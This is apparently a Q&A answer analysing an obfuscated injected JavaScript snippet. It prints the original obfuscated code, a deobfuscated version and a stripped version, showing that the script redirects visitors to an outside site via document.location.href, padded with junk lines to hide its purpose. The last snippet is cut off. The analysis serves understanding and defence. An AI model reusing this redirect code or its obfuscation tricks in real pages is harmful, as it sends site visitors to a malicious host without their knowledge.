Answer:
Script is running
document.location.href = "http://mvblaw.com/z.htm"; //Evil site (I assume)
It also contains a large number of useless lines to hide the purpose of the script.
Analysis
Here it is unpacked.
function mD() {}; this.aB = 43719; mD.prototype = { i: function () { var w = new Date(); this.j = ''; var x = function () {}; var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, ''); var d = new Date(); y = ""; aL = ""; var f = document; var s = function () {}; this.yE = ""; aN = ""; var dL = ''; var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')]; this.v = "v"; var q = 27427; var m = new Date(); iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a; dE = ''; k = ""; var qY = function () {}; } }; xO = false; var b = new mD(); yY = ""; bi(); this.xT = '';
Cleaning obfuscation and adding meaningful names, it becomes
function TempClass() {}; this.aB = 43719; TempClass.prototype = { doIt: function () { var w = new Date(); this.j = ''; var x = function () {}; var a = "http://mvblaw.com/z.htm"; //Evil site (I assume) var d = new Date(); y = ""; aL = ""; var f = document; var s = function () {}; this.yE = ""; aN = ""; var dL = ''; var iD = f['location']; this.v = "v"; var q = 27427; var m = new Date(); iD['href'] = a; dE = ''; k = ""; var qY = function () {}; } }; xO = false; var b = new TempClass(); yY = ""; b.doIt(); this.xT = '';
Removing all useless lines, it becomes
function TempClass() {}; TempClass.prototype = { doIt: function () { var a = "http://mvblaw.com/z.htm";
source share